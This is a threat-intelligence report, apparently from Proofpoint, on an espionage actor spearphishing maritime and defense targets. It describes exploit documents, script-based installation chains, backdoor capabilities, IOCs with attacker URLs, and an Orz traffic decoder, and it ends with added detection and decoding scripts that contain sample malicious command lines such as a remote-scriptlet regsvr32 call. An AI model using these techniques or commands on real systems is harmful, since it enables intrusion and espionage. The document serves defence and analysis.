# Leviathan: Espionage actor spearphishes maritime and defense targets

**[proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets](https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets)**

October 16, 2017

Axel F, Pierre T

**Overview**

Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has a long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

Key takeaways from this research include:

- Industry targeting: The actor targets defense contractors, universities (particularly those with military research ties), legal organizations [3] and government agencies [3]. The actor has a particular interest in naval industries, including shipbuilding and related research.
- Geographical targeting: Targeting includes the United States, Western Europe, and the South China Sea.
- Tools: Custom JavaScript [malware](https://www.proofpoint.com/us/threat-reference/malware) known as “Orz” and “NanHaiShu”, Cobalt Strike, the SeDll JavaScript loader, and the MockDll DLL loader.
- Delivery: Emailed attachments and URLs, often employing a fraudulent lookalike domain and stolen branding.
- Exploitation: Microsoft Excel and Word documents with macros (sometimes password-protected), very recent vulnerabilities such as [CVE-2017-0199](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199) and [CVE-2017-8759](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759), and malicious Microsoft Publisher files.
- Installation: JavaScript, JavaScript Scriptlets in XML, HTA, PowerShell, WMI, regsvr32, Squiblydoo.
- Lateral Movement: The actor sometimes utilizes access at one compromised organization to attack the next. For example, compromised email accounts at one organization were used to send the next wave of malicious attachments to potential victims in the same industry. Similarly, the actor attempts to compromise servers within victim organizations and use them for command and control (C&C) for their malware.

This blog traces key activities connected to this actor and examines a number of their tools and techniques. Campaigns and details are presented in reverse chronological order to highlight the group’s most recent activities.

**Delivery and Exploitation**

_September 2017_

On September 15 and 19, 2017, Proofpoint detected and blocked [spearphishing](https://www.proofpoint.com/us/threat-reference/spear-phishing) emails from this group targeting a US shipbuilding company and a US university research center with military ties. Example emails used the subject “Apply for internship position” and contained an attachment “resume.rtf”.
Another attachment, “ARLUAS_FieldLog_2017-08-21.doc”, contained a “Torpedo recovery experiment” lure. The attachments exploited CVE-2017-8759, which had been discovered and documented only five days prior to the campaign [1].

_Figure 1: Example attachment resume.rtf from September 2017 campaign_

_August 2017_

Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors. Some of this activity was documented and observed by a fellow researcher [2]. Many of the documents, C&C domains, and payload domains abused the brand of a major provider of ships, submarines, and other vessels with military applications. Some of the documents exploited CVE-2017-0199 to deliver the payload.

_Figure 2: One of the documents involved in the campaign used Microsoft licensing lures purporting to be from a well-known shipbuilder (sha256: 6f6ee01e9dc2d8c4c260ef4131fe88dc152e53ee8afd3e66e92d4e1bf5fd2e92)._

Other documents were Microsoft Publisher files that relied on social engineering. The potential victims were lured into starting an embedded PowerPoint presentation, moving the mouse to trigger execution of an embedded JavaScript [5], and then pressing “Enable” in a warning dialog to cause the payload download. The Publisher files were poorly crafted, relied on multiple user interactions, and contained multiple grammatical and typographic errors.

_Figure 3: Publisher document delivered via a link in email is in Italian, and is a simple reuse of a student’s work._

_February 2015_

From February to October of 2015, our colleagues at F-Secure and McAfee reported on campaigns [3][4] by this actor targeting South China Sea interests. During this time, the group utilized Microsoft Excel and Word documents with macros to target the Philippines Department of Justice, APEC organizers, and an international law firm.
Targeting of these organizations differs from what we typically observe for this actor; however, it still centers on marine and naval issues as they relate to South China Sea politics.

_Figure 4: Example attachment “DOJ Staff bonus January 13, 2015.xls”. Similar to this document attachment, most of the attachments in this campaign did not contain meaningful content._

_November 2014_

The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor. The actor generally emailed Microsoft Excel documents with malicious macros to US universities with military interests, most frequently related to the Navy. The actor also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations with military and intelligence ties during this period. Emails were often very simple, with a greeting and an attachment. On other occasions, it appears that the attackers used highly topical lures based on current events or legitimate documents stolen from previous victims. Lure topics included symposia, the Navy, IT, and relevant research.

_Figure 5: Example Excel attachment “2014 Accomplishments Input Template.xls”_

**Installation**

The actor continues to:

- Innovate and modify the code that accomplishes the installation, while the backdoor code remains more static
- Use scripting languages such as JavaScript, JavaScript Scriptlets, VBScript, and XML
- Use simple obfuscation such as base64, gzip compression, and insertion of garbage characters
- Split the functionality of the backdoor and the code that establishes persistence for the backdoor into separate files and scripts

_Example 1: Resume.rtf_

The “resume.rtf” file from the September 19, 2017 attack retrieves the malicious SOAP WSDL definition named “readme.txt” using an anonymous FTP logon to the attacker’s server.
_Figure 6: SOAP WSDL definition (“readme.txt”)_

This definition in turn downloads a VBScript favicon.ico file, which then creates and runs two JavaScript files in the %TMP% directory:

_Figure 7: Code snippet showing the VBScript dropping two JavaScript files_

The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file "Java(TM) Platform SE Auto Updater.lnk" in the "Startup" special folder pointing to the main backdoor JavaScript.

_Figure 8: Code for establishing persistence after reboot (autostart mechanism)_

The job of the larger of the two JavaScripts is to download and execute the Cobalt Strike payload. It accomplishes this by writing more code to rWug5n0PHUFjDFyb8k.js in the temporary directory, which then runs a PowerShell command (obfuscated using garbage characters, base64 encoding, and Gzip compression). The PowerShell is a default Cobalt Strike downloader.

_Figure 9: PowerShell code downloading Cobalt Strike_

_Example 2: Malicious Microsoft Publisher document_

The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server:

_Figure 10: Malicious script executed by the Microsoft Publisher file (sha256: 305f331bfb1e97028f8c92cbcb1dff2741dcddacc76843e65f9b1ec5a66f52bc)_

Similar to the previous example (resume.rtf), 0.js handles the system autostart mechanism via a shortcut file "office 365.lnk" in the "Startup" special folder. However, the shortcut abuses the “Squiblydoo” technique [6]. Moreover, the backdoor is not run directly but via an intermediary, SeDll (see below). 0.js also downloads two additional files from the C&C server (green.ddd and green.tmp). The first of these files, green.ddd, is an executable file internally named “SEDll_Win32.dll”.
This is a known backdoor component used by this actor since 2014 for the same purpose: decrypting and executing the final JavaScript backdoor “Orz”.

**Tools**

_NanHaiShu_

We have observed variants of this JavaScript backdoor used in various campaigns, including those publicly reported. The actor continues to improve and refine the malware by, for example, wrapping it inside an HTA wrapper. Several good descriptions are available in analyses from fellow researchers [3][4]. Basic functionality includes:

- Information gathering (computer name, user name, serial number, proxy server)
- Downloading from URL
- Executing other JavaScript
- Registry, system, process, directory, file operations
- SafeIE (change IE settings to reduce warnings about malware activity)

_Figure 11: Screenshot from 2015 version of the malware dropped by “DOJ Staff bonus January 13, 2015.xls”_

_Orz_

We observed this backdoor in an August 2017 campaign dropped by the Microsoft Publisher files, as well as much earlier in 2014. We named it after a variable name “orz”, which is changed to “core” in the more recent version. The actor consistently tweaks and improves this backdoor as well. The backdoor is a fairly involved script malware. Its functionality includes:

- Information gathering (IE version, OS version, OS 64-bit/32-bit, etc.)
- Overwriting registry settings to reduce malware visibility on the system
- Download file
- Upload file
- Execute a command with cscript
- Execute JavaScript
- Execute shell command
- Execute a DLL (via an embedded ‘MockDll’)
- Get proxy info
- Get process list
- Terminate process
- Get drive info
- GET request to a URL
- POST request to a URL

_Figure 12: Snippet of the Orz backdoor code delivered by the Microsoft Publisher document. The URL domain is a fraudulent lookalike domain._

There is an extensive configuration section at the top of the script.
The "jmpUrlList" provides the initial C&C servers, which are used to determine the secondary C&C server as well as additional commands to execute. It is worth noting that the secondary C&C may be the same as the first. We have observed attacker-controlled web servers, compromised victim web servers, and Technet and Pastebin web pages used for the initial C&C.

The initial C&C response is parsed with a regex. The backdoor first looks for the secondary encoded C&C server using the "jmpRegex" regex. Next, the backdoor looks for additional code to execute using the "codeRegex" regex. For additional code, we observed simple code blocks that provide a different upload/download functionality.

_Figure 13: The encoded response "vcmQx3ELgTyTyOVSvsm7wrBKwraFw8VFwCuL" in the image above decodes to "hxxp://www.vitaminmain[.]info", which is the secondary C&C server for an older backdoor variant (decoder provided in the Appendix)._

_MockDll_

Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is simply to run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14:

_Figure 14: MockDll configuration file_

- mock: defaults to 'regsvr32'
- real: the DLL which is the ultimate goal to execute
- args: arguments to the DLL that will be executed, if any
- outf: file in which to write the results of the MockDll run
- time: timeout, defaults to 5

After the configuration file is created, the MockDll is executed with regsvr32. MockDll reads the .ini config file to determine what to execute. It can log its execution results into a file specified by the “outf” parameter, as shown in Figure 15:

_Figure 15: Contents of the log file created by MockDll_

_SeDll_

This DLL is used for decrypting and executing another JavaScript backdoor such as Orz.
The DLL is registered by the installer using regsvr32. The DllRegisterServer export is then called, which performs checks on the command-line parameter. If the string “DR” is passed as an argument, or if the DLL is running in the active session with a username that is not “system”, the final JavaScript backdoor is decoded using a custom base64 alphabet. This backdoor has to be present in the same directory as the DLL, with a “.tmp” file extension. The backdoor script is then executed using the IActiveScript and IActiveScriptParse32 COM interfaces.

_Figure 16: Decoding and executing of the JavaScript backdoor_

If those conditions are not met, it runs the command line `regsvr32 /s "%s" DR __CIM__` to register the DLL, where %s is the path to the DLL. It tries to do this with the current user's privileges, but if the privileges cannot be adjusted it defaults to the available execution environment.

_Cobalt Strike_

This is a penetration testing tool. The attackers often abuse the free trial version.

**Conclusion**

This actor, whose espionage activities primarily focus on targets in the US and Western Europe with military ties, has been active since at least 2014. The tools, techniques, and targets consistently connect their work, particularly given their attention to naval and maritime defense interests and use of custom backdoors. While defense contractors and academic research centers with military ties should always be cognizant of the potential for cyberattacks, organizations fitting their targeting profiles should be especially wary of legitimate-looking but unsolicited emails from outside entities. Appropriate layered defenses at the firewall, email gateway, and endpoint can all help prevent the kinds of lateral movement we have observed with this actor, as well as the compromise and abuse of systems via which this group expands its attack surface to other organizations.
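The installation chain described in the Installation section and the SeDll registration command above leave distinctive traces in endpoint telemetry: a script host launched on a .js file from %TMP%, a .lnk written into the Startup folder by that script host, a base64-encoded PowerShell command, and regsvr32 invoked either for a Squiblydoo scriptlet or with the `DR __CIM__` arguments. The following triage script is an added example written for this page, not Proofpoint's code. The events are constructed in Sysmon-style fields (the user name "alice", the benign rows and the example.invalid URL are invented; the file and shortcut names echo the write-up). The regsvr32 plus scrobj.dll plus `/i:` pattern is the Squiblydoo command shape from the referenced advisory [6], not something spelled out on this page; the rule names (`triage`, `flagged_ids`, etc.) are the example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed telemetry (Sysmon-style fields). File and shortcut names echo
# the write-up; the user "alice", the benign rows and example.invalid are
# invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "e1", "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\rWug5n0PHUFjDFyb8k.js"'},
    {"id": "e2", "type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java(TM) Platform SE Auto Updater.lnk"},
    {"id": "e3", "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -enc QUFBQUFBQUE="},
    {"id": "e4", "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://example.invalid/office.sct scrobj.dll"},
    {"id": "e5", "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Users\alice\AppData\Local\Temp\green.ddd" DR __CIM__'},
    {"id": "e6", "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},  # benign
    {"id": "e7", "type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //nologo "C:\Scripts\inventory.vbs"'},  # benign
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Script file launched from a temp directory (the dropped .js files, link.js).
TEMP_SCRIPT = re.compile(r'\\Temp\\[^"\s]+\.(?:js|jse|vbs|vbe|wsf|hta)\b', re.I)
# Shortcut written into the per-user Startup folder (the autostart mechanism).
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
# Base64-encoded PowerShell command (the Cobalt Strike downloader stage).
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I)
# SeDll registering itself; argument string taken from the SeDll description.
SEDLL_REGISTER = re.compile(r"\bDR\s+__CIM__\b")


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) pairs for every event matching a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        name = image_name(ev["image"])
        if ev["type"] == "process":
            cl = ev["cmdline"]
            low = cl.lower()
            if name in SCRIPT_HOSTS and TEMP_SCRIPT.search(cl):
                hits.append((ev["id"], "script_host_from_temp"))
            if name == "regsvr32.exe" and "scrobj.dll" in low and "/i:" in low:
                # Squiblydoo: regsvr32 loading a remote scriptlet via scrobj.dll [6].
                hits.append((ev["id"], "squiblydoo_scriptlet"))
            if name == "regsvr32.exe" and SEDLL_REGISTER.search(cl):
                hits.append((ev["id"], "sedll_self_registration"))
            if name == "powershell.exe" and ENCODED_PS.search(cl):
                hits.append((ev["id"], "encoded_powershell"))
        elif ev["type"] == "file":
            if name in SCRIPT_HOSTS and STARTUP_LNK.search(ev["path"]):
                hits.append((ev["id"], "startup_lnk_from_script_host"))
    return hits


def flagged_ids(events: List[Dict[str, str]]) -> List[str]:
    """Distinct event ids that triggered at least one rule, in input order."""
    seen: List[str] = []
    for ev_id, _ in triage(events):
        if ev_id not in seen:
            seen.append(ev_id)
    return seen


if __name__ == "__main__":
    for ev_id, rule in triage(SAMPLE_EVENTS):
        print(f"{ev_id}: {rule}")
```

Each rule keys on the parent image as well as the command line or path, so an administrator's own cscript job (e7) and a vendor DLL registration (e6) are not flagged; the rules are meant as a starting point for hunting queries, not as a complete signature set for this actor.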
**References**

[1] [https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html](https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html)

[2] [https://twitter.com/James_inthe_box/status/893525493059788800](https://twitter.com/James_inthe_box/status/893525493059788800)

[3] [https://labsblog.f-secure.com/2016/08/04/nanhaishu-rating-the-south-china-sea/](https://labsblog.f-secure.com/2016/08/04/nanhaishu-rating-the-south-china-sea/)

[4] [https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-socialengineering](https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-socialengineering)

[5] [http://blog.trendmicro.com/trendlabs-security-intelligence/mouseover-otlard-gootkit/](http://blog.trendmicro.com/trendlabs-security-intelligence/mouseover-otlard-gootkit/)

[6] [https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-nativeos-tools-to-live-off-the-land/](https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-nativeos-tools-to-live-off-the-land/)

**Indicators of Compromise (IOCs)**

| IOC | IOC Type | Description |
|---|---|---|
| cdf6e2e928a89cbb857e688055a25e37a8d8b8b90530bd52c8548fb544f66f1f | SHA256 | Resume.rtf exploiting CVE-2017-8759 (Sep 19, 2017) |
| c7fa6f27ec4f4142ae591f2dd7c63d046431945f03c87dbed88d79f55180a46d | SHA256 | ARLUAS_FieldLog_2017-08-21.doc exploiting CVE-2017-8759 (Sep 19, 2017) |
| ftp://185.106.120[.]206/pub/readme.txt | URL | Resume.rtf downloading scripts (Sep 19, 2017) |
| hxxp://185.106.120[.]206/favicon.ico | URL | Resume.rtf downloading scripts (Sep 19, 2017) |
| 39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36 | SHA256 | Favicon.ico (Sep 19, 2017) |
| 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362 | SHA256 | Cobalt Strike (Sep 19, 2017) |
| ced7ca9625543d3d3d09f70223cc19f0d99e21792854452df5ba84b3a59d17b8 | SHA256 | 20170720_final_pm_app2.doc document hash (August 2017) |
| 305f331bfb1e97028f8c92cbcb1dff2741dcddacc76843e65f9b1ec5a66f52bc | SHA256 | Publisher hash (August 2017) |
| bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922 | SHA256 | MockDll 32-bit (August 2017) |
| 80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca | SHA256 | MockDll 32-bit (August 2017) |
| 146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4 | SHA256 | green.ddd SeDll (August 2017) |
| 4029b43c7febd05e8bf013c1022244aaa238341ca44bbce2250667614c1a4932 | SHA256 | 2014 Accomplishments Input Template.xls (December 2014) |
| hxxp://www.vitaminmain[.]info | URL | Orz secondary C2 (December 2014) |

**ET and ETPRO Suricata/Snort Coverage**

| SID | Signature |
|---|---|
| 2024192 | ET EXPLOIT Possible CVE-2017-0199 HTA Inbound |
| 2024196 | ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199 |
| 2022520 | ET POLICY Possible HTA Application Download |
| 2024197 | ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE 2017 0199) |
| 2024449 | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
| 2814013 | ETPRO TROJAN Meterpreter or Other Reverse Shell SSL Cert |
| 2023629 | ET INFO Suspicious Empty SSL Certificate - Observed in Cobalt Strike |
| 2810628 | ETPRO TROJAN JavaScript Backdoor CnC Beacon M2 (b64 3) |
| 2828317 | ETPRO TROJAN Orz JavaScript Backdoor Communicating with CnC |
| 2828316 | ETPRO TROJAN Orz JavaScript Backdoor Sending Password to CnC |

**Appendix: Orz Traffic Decoder**

```javascript
var _keyStr = "oMZF/W42VkcCbqOiPSajhnKtQws8NRAxr16XJpu=0mgE3THGLlvz9+5BDYd7feyUI";

// Custom-alphabet base64 decoder. The 65th symbol of _keyStr ("I", index 64)
// plays the role "=" plays in standard base64. _keyStr and _utf8_decode are
// referenced directly (rather than via this.) so the functions also work
// outside a browser's global scope.
function decode(input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (i < input.length) {
        enc1 = _keyStr.indexOf(input.charAt(i++));
        enc2 = _keyStr.indexOf(input.charAt(i++));
        enc3 = _keyStr.indexOf(input.charAt(i++));
        enc4 = _keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        if (enc3 != 64) {
            output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
            output = output + String.fromCharCode(chr3);
        }
    }
    output = _utf8_decode(output);
    return output;
}

// Interpret the decoded byte string as UTF-8 (1-, 2- and 3-byte sequences).
function _utf8_decode(utftext) {
    var string = "";
    var i = 0;
    var c = 0, c2 = 0, c3 = 0;
    while (i < utftext.length) {
        c = utftext.charCodeAt(i);
        if (c < 128) {
            string += String.fromCharCode(c);
            i++;
        } else if ((c > 191) && (c < 224)) {
            c2 = utftext.charCodeAt(i + 1);
            string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
            i += 2;
        } else {
            c2 = utftext.charCodeAt(i + 1);
            c3 = utftext.charCodeAt(i + 2);
            string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
            i += 3;
        }
    }
    return string;
}

var decodeme = "s2S9NF0GCBRBRvY9s2pzN5nHsBk+N2oT8KWvsKYpNBpzR4nTNvYGNuNdOFoDbZeTQtkm8unzAtq9wK+zCLII";
var res = decode(decodeme);
document.write(res); // run in a browser; use console.log(res) elsewhere
```
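The custom base64 alphabet that SeDll uses to decode the ".tmp" backdoor (SeDll section) and that the Orz C&C responses in Figure 13 use are the same transformation the appendix decoder performs. The following Python port is an added example written for this page, not Proofpoint's code: it takes the alphabet as a parameter so a sample's own `_keyStr` can be dropped in, decodes to raw bytes before interpreting them as UTF-8, cross-checks itself against the standard library on standard base64, and defangs the result in the hxxp/[.] notation used in this write-up. `ORZ_ALPHABET` and `SAMPLE_RESPONSE` are copied from the appendix; the function names (`decode_custom_b64`, `decode_response`, `defang`, `self_check`) are the example's own.

```python
import base64
import string

# Custom alphabet from the appendix decoder (_keyStr): 64 value symbols plus
# a 65th symbol, "I", that plays the role "=" plays in standard base64.
ORZ_ALPHABET = "oMZF/W42VkcCbqOiPSajhnKtQws8NRAxr16XJpu=0mgE3THGLlvz9+5BDYd7feyUI"
# Standard alphabet laid out the same way (pad symbol last); used by self_check.
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="
# Encoded C&C response copied from the appendix ("decodeme").
SAMPLE_RESPONSE = "s2S9NF0GCBRBRvY9s2pzN5nHsBk+N2oT8KWvsKYpNBpzR4nTNvYGNuNdOFoDbZeTQtkm8unzAtq9wK+zCLII"


def decode_custom_b64(text: str, alphabet: str = ORZ_ALPHABET) -> bytes:
    """Decode base64 written with a 65-symbol alphabet whose last symbol pads.

    Mirrors the appendix routine: symbols outside the alphabet are dropped
    (the original strips anything outside [A-Za-z0-9+/=]), each group of four
    symbols yields up to three bytes, and a pad in position 3 or 4 suppresses
    the corresponding byte.
    """
    if len(alphabet) != 65 or len(set(alphabet)) != 65:
        raise ValueError("alphabet must contain 65 distinct symbols")
    index = {ch: i for i, ch in enumerate(alphabet)}
    pad = alphabet[64]
    symbols = [ch for ch in text if ch in index]
    if len(symbols) % 4:
        raise ValueError("symbol count is not a multiple of 4")
    out = bytearray()
    for i in range(0, len(symbols), 4):
        s1, s2, s3, s4 = symbols[i:i + 4]
        e1, e2, e3, e4 = index[s1], index[s2], index[s3], index[s4]
        out.append(((e1 << 2) | (e2 >> 4)) & 0xFF)
        if s3 != pad:
            out.append((((e2 & 15) << 4) | (e3 >> 2)) & 0xFF)
        if s4 != pad:
            out.append((((e3 & 3) << 6) | e4) & 0xFF)
    return bytes(out)


def decode_response(text: str, alphabet: str = ORZ_ALPHABET) -> str:
    """Decode and interpret the bytes as UTF-8 (the appendix's _utf8_decode step)."""
    return decode_custom_b64(text, alphabet).decode("utf-8", errors="replace")


def defang(url: str) -> str:
    """Render a URL in the hxxp:// and [.] notation used in this write-up."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def self_check() -> bool:
    """Cross-check the port against the standard library on standard base64."""
    samples = [b"", b"f", b"fo", b"foo", b"foob", b"fooba", b"foobar", bytes(range(256))]
    for raw in samples:
        encoded = base64.b64encode(raw).decode("ascii")
        if decode_custom_b64(encoded, STD_ALPHABET) != raw:
            return False
    return True


if __name__ == "__main__":
    assert self_check()
    print(defang(decode_response(SAMPLE_RESPONSE)))
```

The alphabet is part of each sample's configuration and changes between variants, so when decoding responses captured for a different sample, pass that sample's key string as `alphabet` rather than assuming the one above.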